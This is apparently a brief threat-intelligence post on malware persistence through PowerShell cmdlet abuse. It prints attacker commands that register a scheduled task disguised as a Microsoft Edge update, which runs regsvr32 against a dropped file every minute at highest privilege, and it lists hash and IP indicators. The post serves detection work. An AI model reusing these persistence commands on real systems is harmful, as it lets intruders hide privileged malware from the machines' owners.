PowerShell Cmdlet Abuse for Persistence in Malware Attacks
While this persistence technique isn't rare, it's not very common to see attackers using these specific cmdlets. Cmdlet abuse refers to the misuse of PowerShell commands (cmdlets) by attackers
In this instance, the task was disguised to appear as a Microsoft Edge update.
powershell "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/S /i:SYNC C:\Users<USER>\AppData\Roaming\9secur32_5.drv") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C51CED40-3F5F-4FAF-E44D-E40FBA838523}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Moreover, the adversary employed PowerShell to verify the existence of the scheduled task:
powershell -Command "if (Get-ScheduledTask | Where-Object { $.Actions.Execute -eq 'regsvr32' -and $.Actions.Arguments -eq '/S /i:SYNC C:\Users<USER>\AppData\Roaming\9secur32_5.drv' }) { exit 0 } else { exit 1 }"
As demonstrated, these cmdlets offer valuable opportunities for detection
IOCs Malicious File(s) SHA256 582ca9b2b5b8f8e5f79185f60a6893ec782527e464f037360678fc61e513dcd2 d2fbc247f3f5e8bec0f7a282b6ea1a0d650cb86de337a7bd8a4be292f9a7e959 06c1d2ea250d4c6453675091b1064154068c69ed6f01de7d00f5851d7ac66ba1 da32159b27065337a699264da4778b7c99f8fbb4f00617061b9a5b5397bd5973
Malicous IP(s) 93[.]185[.]97[.]211 66[.]94[.]121[.]207